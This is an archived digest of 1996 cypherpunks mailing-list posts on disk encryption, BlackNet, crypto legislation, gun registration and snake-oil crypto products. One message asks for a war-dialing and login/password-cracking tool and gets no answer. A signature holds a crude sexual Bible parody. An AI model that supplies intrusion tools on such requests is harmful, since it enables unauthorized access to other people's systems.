From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wayne Lambert <lambert@tyenet.com>
Date: Wed, 28 Aug 1996 11:34:50 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608280103.SAA06674@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 27 21:06:05 1996

- ---
Wayne Lambert
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQC1AwUBMiObgojTYwU2UXOVAQHNtwT9Gt9WFfG5WNWwfiqNKU/mOQdzVAY17108
E9h5kVZOuTmA64RIbtwDwD8ehfdJBYguaxIY5Iwm6no9R7YlS5JfyPZ1a1LdnUkp
nA/Le0Ru2pnb4jDLt2fvYDox9NatBH18nIKNWkDo7l3nxf8y4gur/WS2OHlNsiw+
otNsi993lNuIieYgJ4ZZ3qp0vBhMjvOsUgNZ0RaSpHAei65lcpAInw==
=/+Dx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Drifter <drifter@c2.net>
Date: Wed, 28 Aug 1996 12:21:48 +0800
To: cypherpunks@toad.com
Subject: Re: File System Encryption
In-Reply-To: <199608271401.JAA04116@xanadu.io.com>
Message-ID: <Pine.SUN.3.94.960827181039.23478A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 27 Aug 1996, Douglas R. Floyd wrote:

> If you have another 386 or 486 lying around, you could install Linux and
> Ian's encrypted loopback code on a remote box, then NFS or Samba the
> filesystem over.  For protection, you could modify the vlock command to
> lock the console (and not unlock it), and disable inetd.  Then, unless
> someone has the permissions to access the files through the network, the
> files are inaccessable ;-).

I may have to consider this approach. I'll have to look into Ian's system.
Does it pass muster with the crypto gods? (that's meant as a compliment
guys :)

Drifter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Drifter <drifter@c2.net>
Date: Wed, 28 Aug 1996 12:11:42 +0800
To: cypherpunks@toad.com
Subject: Re: File System Encryption
Message-ID: <Pine.SUN.3.94.960827181944.23478B-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996 02:55:20 +0400, Wayne Clerke <wclerke@emirates.net.ae>
wrote:

>Tried secdev? Edgar Swank (author of secdrv) recently posted
>that secdev (note, not secdrv) does, in fact, uses 32 bit disk 
>access with win95. Win95 reports that the secure device is in 
>compatibility mode, but the host disk (and therefore the secure 
>volume file) is being accessed in 32 bit (disk) mode. Not sure 
>what issues there are with '32 bit FILE access' mode here. 
>
>Sounds worth a try though. Please post the results if 
>you try this.
>

I have actually had Secure File System, Secure Drive, and Secure Device
all installed with mounted volumes at the same time under Win95.  However,
32bit file access is not the problem.  When you load a TSR in Win95, the
operating system forces you into 16bit DOS compatability mode.  I'm not a
kernal guru so I can't explain all the specifics, but it basically makes
95 act as Win-3.11 and looses multithreading (as it were) and creates
serious memory paging problems if you have >32mb installed.

Thanks for the reply though .. and if you need assitance with getting
SECDEV working under 95, just drop me a note.

Drifter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 28 Aug 1996 12:06:17 +0800
To: Charley Sparks <cypherpunks@toad.com
Subject: Re: a question please
Message-ID: <ae48f18d02021004648c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 8/27/96, Charley Sparks wrote:

>I have been lurking for some time, the occasional quip of a post, perhaps
>a comment
>on a "shrink wrap" - I still haven't figured out "Black Net"
>Done searches, ( the usual ) and no luck... can I get a break ? Would
>someone please
>explain it to me ?

Then perhaps you need new search tools!

My own searches of one of the mysteries you mentioned, BlackNet, produce
lots of informative results. But, then, I use Alta Vista, the One True
Search Engine.

(Actually, all similar search engines, e.g. Excite, Yahoo, Inktomi, etc.,
produce comparable results.)

And since I have been seeing your messages--which I presume is roughly
coterminous with you subscription to this list--there have been several
mentions of my Cyphernomicon FAQ. I suggest you consult this for long
explanations of many Cypherpunks topics.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Wed, 28 Aug 1996 11:29:29 +0800
To: baby-x@cyberpolis.org (baby-X)
Subject: Re: Net Politics
In-Reply-To: <v01540b00ae48e087022c@[206.14.141.118]>
Message-ID: <199608272357.SAA27804@bermuda.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 10:23 AM 8/27/96, Jonah Seiger wrote:

[...]

> 
> I swer I had this conversation somewhere recently, and those of us involved
> in it came up with one reason this rift seems to come up so often and get
> discussed so publically, especially in comparison to our "organized,
> determined" opponents. I would hazard a guess that those people working
> within the cause of electronic freedoms tend not to be the simple
> order-following, authority-heeding sort (compared to, say, followers of the
> Religious Right). It's easy if you're Ralph Reed to send out a flyer or get
> the telemarketters working and tell the troops what to do. It's not as easy
> if you're, say, Jonah Seiger. Not because of Jonah (or Shabbir, or Declan,
> or whoever), but because of his audience. It's not a push-button response
> with us.

The herding cats analogy comes to mind here.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 28 Aug 1996 13:23:25 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Discussion: The Digital Commerce Clause [Long] [Was: Re: The Commerce Clause and the Crypto Issue]
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960828022819Z-22262@mail.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From:	Black Unicorn 
>
>I believe the answer to preserving the purity of digital commerce is to
>form it in such a way so as to make regulation impossible, because in my
>view the constitution no longer provides citizens with the protection or
>freedom to progress.  I feel the same way about privacy.  All the
>constitutional arguments in the world mean little today.  A systematic
>approach which makes violations of personal rights impossible whether
>constitutional or not is the answer.
>.....................................................
>
>
>I, like others on the list, have often misunderstood your references to court
>cases and other legal stuff as indicators that you were being pessimistic,
>discouraging, and presenting obstacles to free-thinking, imaginative ideas.
>
>The way in which you expressed yourself left out your true inclinations on
>the subjects, and it would only be someone who had read a large number of
>your posts who would realize what side of the issues you are really on.
>
>I agree very much with what you say in the above paragraph about the
>constitutional arguments [by jove, I think he's got it :>)]   So many times
>people (especially libertarian types) will present their protests in
>reference to constitutional issues.  Yet there are some contradictions within
>the Constitution, or areas which sound that way, and which are therefore too
>easily misconstrued by present thinkers (judges, lawyers, etc.).
>
>So often the document is referred to like a magic mantra which is going to
>take away the ills and boogeymen by waving it in front of their faces.  But
>the document is not so well read, understood, nor respected by those in
>public office.  It isn't used as a guide to move towards more self-reliance
>rather than less.  I have heard from one political potentiate that his
>opponent (already in office) had not ever even read it.
>
>You can't depend upon adherence to the Constitution to create the reality
>you're after (although, like a dart-shoot, you can always try and it does,
>after all, supply the basics for the established legal procedures and it's
>possible to set the fear of it upon government types by setting their feet to
>its fire -  if you can pay for it).
>
>(This gives me a sense of deja-vu:  I think you and I had a long argument
>about this on the list, once.)
>
>   ..
>Blanc
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Wed, 28 Aug 1996 11:01:05 +0800
To: cypherpunks@toad.com
Subject: a question please
Message-ID: <199608272340.TAA08496@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Aug 27 19:39:45 1996
I have been lurking for some time, the occasional quip of a post, perhaps a comment 
on a "shrink wrap" - I still haven't figured out "Black Net"  
Done searches, ( the usual ) and no luck... can I get a break ? Would someone please 
explain it to me ?

Thanks, and my PSecure is registered !
- --------------------------------
Charley Sparks <sparks@bah.com>
     Booz Allen & Hamilton
- --------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMiOHQuJ+JZd/Y4yVAQGMcwQMDs5Owwd5XH6+XPUVZow4NMq1rV+QXp6W
dLeF0vGT9rg5n6NZJKuAxSFuiXjJLKpv1JePSI2y2mmqMKncajhl2NvvtNPtnK/z
dYF8D2sDvdPVffbxBO7QfjDwV9k5LmEVk24sOjbIk+j6zIZW899OAvT6CadoCmRS
1dQ9VWMyI0vunw==
=tfni
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Manuel Benedicto Procas <mbened@encomix.es>
Date: Wed, 28 Aug 1996 06:35:46 +0800
To: cypherpunks@toad.com
Subject: please help
Message-ID: <v03007802ae48e6335946@[194.143.199.163]>
MIME-Version: 1.0
Content-Type: text/plain


Please...you know a macintosh program in order to war dialing TCP IP
numbers and Unix or VMS localice Login/password cobinations.


MANUEL






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Wed, 28 Aug 1996 13:32:06 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft Explorer security hole (fwd) MSoft's reply...
Message-ID: <199608280257.TAA25752@scn.org>
MIME-Version: 1.0
Content-Type: text/plain



Actually I think its thier lack of foreseeing how a produbt can and will be
used.  Problems throughout thier line of products show this off.
Most of thier products are a creation of Microsoft anyway, they've stolen,
borrowed, purchased or purchased the company to obtain their products, then
added features upon features so they can market the hell out of it
to become #1 in market share. Many cases they've taken a reliable product
and made it less than reliable.
  I don't understand why people continue to support Microsoft they way 
they do!
  
   Ponder the thought of Microsoft buying up every web server/broswer
  company in the first year or two of the WEB?  Would it have made it where
  it is today?  
  Ponder the thought of Micorosft having ultimate control over the
  IETF

>In my experience, one of Microsoft's main problems when it comes to security
>has been its developers and program/product managers don't think like "bad
>guys" when it comes to design and subsequent exploits and holes.
>Unfortunately, the user is the ultimate loser.
>
>Joel
>
>BTW - The paranoid side of me wouldn't be surprised to see PC
>"espionage-enabled" viruses and trojans within the next few years.  Their
>main purpose would be to either disable or patch various security features
>for later attacks, or directly snatch information off of hard drives and
>send it out over the Net.  I know of a few lab projects of a similar nature,
>that were very easy to implement.
>



BTW: When is this list/listserver going to convert the reply-to fields to 
     point to cypherpunks@toad.com?



--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AFDA2@aol.com
Date: Wed, 28 Aug 1996 12:08:23 +0800
To: lindat@iquest.net
Subject: AFDA Web Site
Message-ID: <960827203703_395539315@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


MEMORANDUM

SUBJECT:  AFDA Web site, located at:  http://www.afda.org

In September, the Web site for the Association of Federal Defense Attorneys
(AFDA) will become password-protected for members only.  Those of you who
have paid your membership dues for 1996 will be receiving an email message
containing a User ID and Password, which will be good through December 31,
1997 -- almost a year and a half of unlimited usage for the small membership
fee that allows the association to continue financing the cost of maintaining
and upgrading the web site.

Once the member password system goes into effect in September, the online
Library will be stocked with research memos in many areas of federal criminal
litigation (including topics in white collar / corporate criminal
litigation), along with sample briefs and an expanded collection of court
opinions and government agency documents, all of which can be downloaded to
your hard drive.  At present, the library has all criminal law-related
Supreme Court opinions, key U.S. Sentencing Commission documents (including
the 1995 guidelines), and over 60 operations memoranda of the Bureau of
Prisons.  In addition, the online Newsletter will be expanded to add a
separate section for white collar / corporate criminal defense.  

Please note that upon installing the member-password system, the Message
Board on the web site will provide members with a private resource for
discussing strategies and issues with other colleagues, without feeling
exposed to the general web population.  We hope you will take advantage of
this opportunity and put the message board to good use.

Any of you who have not yet joined the association may do so easily by
clicking the "Join AFDA" bar at the top of the home page and completing the
membership form.

Please feel free to complete the "Feedback" form on the web site so that we
can continue to receive your comments and suggestions, a number of which have
already been incorporated into the site.  Please remember that this web site
exists to serve the educational needs of the federal criminal defense bar, so
the association counts on you to join and give us your views on how the site
can continue to serve specific needs and interests of the defense bar.

All email inquiries should be addressed to:  AFDA2@AOL.com

Best regards to all, and thanks again for your support.

Marc S. Sanders
(System Operator / Webmaster)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 28 Aug 1996 14:56:53 +0800
To: cypherpunks@toad.com
Subject: The Dangers of Complying with "Registration" Laws
Message-ID: <ae4910bd04021004b84d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Several years ago, California decided that certain rifles which had
previously been sold openly and without restriction were now to be
classified as "assault rifles," and owners were to fill out forms and
register them. (I don't recall if a fee was involved.)

(Some of you readers may, of course, think that such guns are in fact more
dangerous than, say, shotguns. This is not so, but this is also beside my
point. My point is not to argue that a Colt AR-15 with various cosmetic
features (such as "flash suppressor") should not be registered. Indeed, I
take it as a given that such registration is in violation of the Second
Amendment. Rather, my point is about the dangers of complying with such
registration laws.)

It turns out that the suckers who voluntarily registered the so-called
assault rifles they owned were subjected to _additional_ and _unwarranted_
delays in later purchases. The article below refers to some cases.

Not surprisingly, the act of voluntarily registering an "assault rifle"
placed one on a computerized list of suspicious citizen-units.

(I'm glad I had the presence of mind not to register my Colt AR-15, bought
in 1975, and having the "evil features" which the criminals in Congress
declared to be evil. Had I done so, I might have been unable to buy the
various guns I've bought recently.)

Although guns are not the same as crypto, and comparisons of crypto to
firearms are flawed, the lesson is that one should NEVER VOLUNTEER! No
doubt in 1999, when citizen-units are ordered to voluntarily register their
copies of assualt cryptography tools, those who step forward like lambs to
the slaughter will find themselves on lists of subversive citizen-units.
Yet more of a reason for Stego-PGP.

This article appeared in rec.guns:


In article <4vssg2$3dh@xring.cs.umd.edu>, wd6cmu@netcom.com (Eric
Williams) wrote:

> In a previous post, John C. Woo (jwoo@rezn8.com) wrote:
> : Eric Williams wrote:
> : # I read somewhere (I can look it up if someone cares) that the DOJ is
> : # holding up paperwork on purchases by people who have registered their
> : # "assault rifle" with the state.  Has anyone experienced this?
>
> : This is starting to sound like a conspiracy.
> : I DO happen to own a registered AR-15 here
> : in sunny California.
>
> : I would be interested to know where you discovered
> : this tasty tidbit.
>
> It came from an paper by David Kopel, "Why gun waiting periods threaten
> public safety." (Journal on Firearms and Public Policy, V1 #4, summer
> '92)  He writes:
>
>   About 10% of California's 300,000 "assault weapon" owners have registered
>   their weapons, as required by law.  The group that complied with the
>   retroactive registration law surely qualifies as a highly law-abiding
>   set of people.  Yet this group of highly law-abiding gun-owners, when
>   they attempt to buy a new rifle or pistol following California's 15-day
>   waiting period, find that the California Department of Justice has put a
>   1 to 4 month hold on their applications because they are registered
>   "assault weapon" owners.
>
> As a cite, he references LA Daily News, March 4, 1991, a letter
> to the editor by William Davis under the title "Gun Law Backfires".
> The letter was from a law enforcement officer and licensed federal
> firearms dealer whose application was put on hold.
> --
> Eric Williams  |  wd6cmu@netcom.com  |  WD6CMU@WD6CMU.#NOCAL.CA.USA.NOAM
>
>  "The information superhighway is a revolution that in years to come will
>   transcend newspapers, radio, and television as an information source.
>   Therefore, I think this is the time to put some restrictions on it."
>                                           -- Sen. James Exon (D-Neb.)


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <Omegaman@bigeasy.com>
Date: Wed, 28 Aug 1996 12:41:16 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: The POUCH
Message-ID: <199608280157.UAA08066@bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


After reading Mr. Holt's announcement and the subsequent replies on 
the list I decided to send him a polite off-list reply.  In it I 
briefly reiterated the argument that knowing how a lock mechanism 
work does not make the lock insecure; furthermore, it makes it more 
secure.

I then stated, in all caps, that not knowing the algorhythm is 
inherently insecure.  I stated that he should not be surprised when 
encryption activists bristle at the knowingly (or otherwise) 
techniques which pander to a crypto-ignorant populace.  
I requested no reply and completed with a few quotes from the "Snake Oil" 
chapter of the PGP documention.  I told him to ask himself if he felt
that the marketing techniques he was using fit the profile contained 
therein.

While not the friendliest of e-mails, I was certainly civil and 
sincerely hoped to prod Mr. Holt to consider these issues and assess 
his approach.

His reply was so rediculous that I decided to post it to the list 
with my own reply attached.  Chuckle at will.

------- Forwarded Message Follows -------
From:          Self <Single-user mode>
To:            "JOHN E. HOLT" <76473.1732@CompuServe.COM>
Subject:       Re: The POUCH
Reply-to:      omega@bigeasy.com
Date:          Tue, 27 Aug 1996 20:54:21


> You write me using a software package that was ripped off from RSA
> that you got free from a bulletin board.  What level of trust is that?

You really know nothing at all about encryption.  At least I KNOW 
what I'm getting.  I know what the RSA algorhythm is.  I know it has 
been tested and studied.  Whether or not it was "ripped off" depends 
on whether or not you're related to RSA data security in some way.  
It's a copyright issue and has nothing whatsoever to do with the 
technology itself.  All the algorhythms used in the PGP package were 
written by others; what does that have to do with anything?

What does the price of the software have to do with anything?  If I 
spent money on it does that make it any more secure?  I would gladly 
spend money on secure encryption technology.  I, for one, would like 
to be comfortable that it's money well-spent.

Your defenses are those of one who has nothing to defend.  Crying 
"libel" and making empty statements such as the above are actions 
that divert attention from the truth; that your product is most 
likely worthless crap.  Furthermore, you really don't know for 
yourself whether or not this is true.

Happy selling.

me
------------------------------------------------------------------
Omegaman <omega@bigeasy.com>
PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                       59 0A 01 E3 AF 81 94 63 
Send E-mail with the "get key" in the "Subject:" field
to get my public key
-------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 28 Aug 1996 15:24:04 +0800
To: raffetto@podesta.com (John Raffetto)
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <199608280419.VAA01883@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


While I, on the other hand, am surprised by your over-optimistic tone.  
Bills in Congress are, technically, ALWAYS up for public comment.  And yes, 
they are almost always subject to amendment.  But the REALITY (remember 
reality?!?) is that once a bill has been officially introduced in Congress, 
it is substantially more difficult to add a good part, or remove a bad part, 
than if the bill remained on a word-processor or was simply put on the 'net 
for comments.

The status-quo system might have made sense in the pre-Internet era, when 
the public familiarity of issues and/or legislation was less, or 
communication costs to the public were higher, etc.  But today, when it's 
easy and cheap to put the text of a proposed bill on the Internet, it simply 
no longer makes sense to not accept public comment BEFORE the 
"high-hysteresis" environment of Congress has been entered.

Here's what is REALLY going on.  Congress wants to maintain the illusion 
that the public actually has some input into the way bills are drafted.  But 
in reality, they want essentially total control.  One of the many biases 
inserted into the system to ensure this control is maintained is to disguise 
the extent to which special interests (and Congress, itself, is a "special 
interest") get to dictate how law reads.  

Consider the alternative, and in particular the Leahy crypto bill, and even 
more particularly the portion of that bill criminalizing the use of 
encryption in a way which thwarts an investigation.  Suppose the pieces of 
entire bill, before actual filing, had been publicly posted on the Internet, 
and there had been either a vote or at least a collection of comments about 
the individual proposed sections.  What would have happened?  That portion 
of the bill would have gotten flamed and rejected, with a large majority 
opposing it.  Moreover, we would all have KNOWN that it had been rejected.  
At that point, if Leahy still insisted on including it, it would be 
tantamount to giving the 'net his middle finger, and we would have rightly 
lambasted Leahy, as he deserved.  Moreover, we would have known that someone 
was pushing that part of the bill, and could reasonably insist that he is 
identified.

But the way Leahy actually proposed it, in a package that had been put 
together in secret, it isn't clear how much Leahy detests our opinions, and 
he might actually have gotten away with foisting this on us.  

See the difference?  An open system holds legislators to a much higher 
standard, which is why they don't like it and is why we should insist on it. 
  An open system reveals to the public if their interests are being 
followed.  An open system will allow more people to become aware of being 
screwed by politicians, maybe even before it happens, and it will allow them 
to reject legislative proposals which contain undesirable portions, 
particularly portions which are written into a bill despite opposition.

_THAT_ could, hypothetically, become the "legislative process" someday.  In 
fact, it SHOULD BE the legislative process.  I consider the current system 
illegitimate to the extent (at least!) that it is biased against public 
participation.




At 08:51 AM 8/27/96 -0400, John Raffetto wrote:
>Jim -- I'm surprised by your message.  Members of Congress rarely introduce
>bills and say take it or leave it.  Rather, by introducing a bill, they're
>offering it up for public comment.  After introduction, the bill is referred
>to a committee, and perhaps a subcommittee, where there are hearings and the
>like.  The lobbyists swarm in, constituent letters roll in.  Then the bill
>is marked up in committee, and emerges in a revised form.
>
>If you want to vet a proposed piece of legislation on the Internet, then
>copy the text off of THOMAS and post it... then participate in the
>legislative process.
>
>John Raffetto
>
>
>>
>>I believe that it is particularly suspicious that these bills come into 
>>existance without even cursory "vetting" on the Internet.  Both the Leahy 
>>bill and even the Burns crypto bill popped into public view without any 
>>indication of how they were written, or any public input on their intent and 
>>scope.  Perhaps this "take it or leave it" practice is old hat to 
>>politicians, but frankly I'm disgusted at politicians' presumption that they 
>>can prepare a law with no identifiable input from the public.
>>
>>I am similarly disgusted at any organization (even if, ostensibly, acting in 
>>support of "net freedom") that assisted in the development of the Leahy 
>>crypto bill (and to some extent, even the Burns bill) because they clearly 
>>failed to solicit the kind of public input that such bills should 
>>automatically get.
>>
>>And in a sense, "the Net" doesn't NEED "strong supporters": what we need are 
>>politicians who are willing to LEAVE US ALONE!  It should come as no 
>>surprise that the call you frequently see among net-freedom- supporters for 
>>new legislation is that which repeals existing restrictive laws, such as 
>>ITAR and censorship laws.  
>>
>>Jim Bell
>>jimbell@pacifier.com
>>
>>
>
>
>
>

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael T. Babcock" <mbabcock@tyenet.com>
Date: Wed, 28 Aug 1996 14:56:49 +0800
To: liberty@gate.net
Subject: Re: Pronto making a comment
Message-ID: <199608280425.VAA09757@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: liberty@gate.net, cypherpunks@toad.com
Date: Wed Aug 28 00:17:58 1996
> >-----BEGIN PGP SIGNATURE-----
> >Version: 2.6.3i
> >Charset: ascii
> >Comment: http://www.cyberbeach.net/~mbabcock/PGP/
> 
> How did you get Pronto to do a comment?
> JMR

I added a "comment=" in my config.txt ;) ... the old fashionned way.
Message Copyright 1996, Michael T. Babcock
http://www.cyberbeach.net/~mbabcock

Send a message with the subject "Send public key" to
receive an automatic reply with my public key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: ascii
Comment: http://www.cyberbeach.net/~mbabcock/PGP/

iQC1AgUBMiPIe9tTCwP6TF2xAQFk4wT/Z4gZo5FW3QbiMKEjcXylL0Q449x2ZvaC
pJ+3i/ExfxoDgxgsRTo7b2/Rz0JWn5x8K1TnAABfoRrnDe/wtoBEGekzxh9U69MQ
RT0m0leok3ep91QKE2WFdWPXw1WHmOduXD+rCPB4cjQ0yENYdHGMnPzTaLG/Y5t3
8q/sq0G4DA7xGbOqJkwa+ALmhaNMt+VTQIfX02RZC0lIJYhcdLs+mQ==
=zMc7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 28 Aug 1996 15:16:42 +0800
To: cypherpunks@toad.com
Subject: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
Message-ID: <ae4916c905021004240c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(I have no idea where the virtual nexus of this debate is taking place...I
see these addresses copied on the message to which I'm replying:
fight-censorship@vorlon.mit.edu, cypherpunks@toad.com, brock@well.com,
telstar@wired.com, shabbir@vtw.org, jseiger@cdt.org (Jonah Seiger), Declan
McCullagh <declan@eff.org>. I despise such massive cross-contamination of
lists and duplication of messages, so I will delete all but the list I am
part of, and Jonah Seiger, out of courtesy, as it his message I am replying
to.)

At 2:23 PM 8/27/96, Jonah Seiger wrote:

>"One more round of 'work within the system' vs 'up against the wall!'," he
>said.
>
>This is an important debate that unfortunately seems to be dividing the
>net.community when we most need to be united. All of us working on
>net-policy issues share a common vision and goals - promoting the free flow
>of information, preserving and enhancing First Amendment values and
>protecting individual privacy. There are, for better or worse, many
>different views on the best way to accomplish those objectives, and the
>debate over who has the right tactics seems to frequently escalate in to
>religious war.
>
>Meanwhile, our opponents are well organized, determined, and do a much
>better job of keeping their internal strategic differences to themselves.
>Perhaps this is part of the reason they keep kicking our butts all over
>town.

I think it laudable that CDT has chosen to remain in D.C. to "work within
the system." Personally, I could never stomach doing this. Nor do I think
the Cypherpunks group per se should do it; technological monkeywrenching of
the best-laid plans of Leahy, Swinestein, and all the other "mice and men"
is so much more effective and satisfying.

Yes, as far as legislation goes, the politicians are constantly on the
offensive, proposing new and more draconian legislation on a continuing
basis. Maybe they hope to wear us out, to create battle fatigue (some say
it worked with EFF, but I've heard various reasons given as to why EFF left
D.C.).

But technology also is winning, in its own way. Web proxies defeat national
governments in their plans to limit access. Remailers have transformed the
Net. Digital pseudonyms have restored anonymous commentaries to their
once-honored place. And the sheer growth of the Net, the Web, and the vast
number of connections has made Leahy- and Exon-style control essentially
hopeless to enforce.

On the specific issue of whether Sen. Leahy is or is not a "friend of the
Net," to use him as an example here, I suggest a different approach.
Instead of classifying Leahy as a friend or an enemy, or Burns as a friend
or an enemy, etc., why not a *ratings system*? As with the "perfect 100%"
liberal ratings that the ACLU or somesuch puts out...

Thus, we can say "Conrad Burns has scored a 67% on Digital Liberty issues,
Patrick Leahy has scored a 42% on these issues, and Dianne Feinstein scored
17%."

Determination would have to be made on what the important issues, but this
has been done successfully in the past, as with the liberal groups and
union groups (and conservative/NRA/family values groups) who "score"
candidates.

A scoring system has the advantage of looking relatively impartial, and
avoids the "friend/enemy" naming, at least in terms of personalities. Thus,
one can say to Leahy, "Sorry, Senator, this is just how you score. If you
want to score higher in the future, take careful note of what our community
thinks is important and vote accordingly."

The issues for a scorecard might be accumulated on the Net, with inputs
from CDT, VTW, EFF, Cypherpunks, and other interested groups. It could be
messy, but perhaps not. Even a *simple* set of principles, picked by almost
any of these organizations, would likely be enough to get a reasonable
scoring system...it's not as if we all don't know that Leahy's support for
the Digital Telephony Bill was a major downcheck--whatever the realpolitik
issues were--and that his support of Pro-Code is a major upcheck. The value
of scoring is that it takes out the often-painful issues of classifying
politicians as "friends" or "enemies."

Objective scoring means never having to say you're sorry.

--Tim may


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 28 Aug 1996 12:55:39 +0800
To: James Fidell <james@corp.netcom.net.uk>
Subject: Re: "The Observer" calls the internet a child pornography ring
In-Reply-To: <199608272209.XAA22191@corp.netcom.net.uk>
Message-ID: <Pine.SUN.3.91.960827213738.4461B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



The   letters page is editor@observer.co.uk . 

The thing  that really got me riled was the use of a quote from Tom Paine 
on the front page as the header to their leader. Tom Paine published most
of his important work anonymously, and thugs wouldoften try to beat up 
the publishers to find out who the author was. (Paine's friends sometimes 
did this too). 

Common.Sense@alpha.c2.org

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 28 Aug 1996 13:16:28 +0800
To: "Michael T. Babcock" <mbabcock@tyenet.com>
Subject: Re: (NOISE) Re: Free Pronto Secure Offer
In-Reply-To: <199608272139.RAA19477@polaris.mindport.net>
Message-ID: <Pine.SUN.3.94.960827215748.5361B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996, Michael T. Babcock wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To: unicorn@schloss.li, cypherpunks@toad.com
> Date: Tue Aug 27 17:33:42 1996
> > So would I, however, the assumption that "cypherpunk crypto review
> > services" are to be had for nothing is the height of arrogance.
> 
> They've already got a lot of us reviewing it... sorry, it's not arrogance 
> - -- they were right.

Read what I said carefully please.  I said the assumption that they are
for free is arrogance.  Perhaps your services are worth less, that's
not really my concern.  They may have a wonderful product, but expecting
and taking for granted free review by the entire list is still arrogance.

> > If you were sincere, you'd thank them with cash.  Afterall, you seem
> > to suggest that you have a good deal of liquidity eh?
> 
> Actually, they lose $99 each time they give us a free copy of the software 
> ...

Uh, no.

Assume a Scoobie Doo Mystery Machine Van is free with your one cent
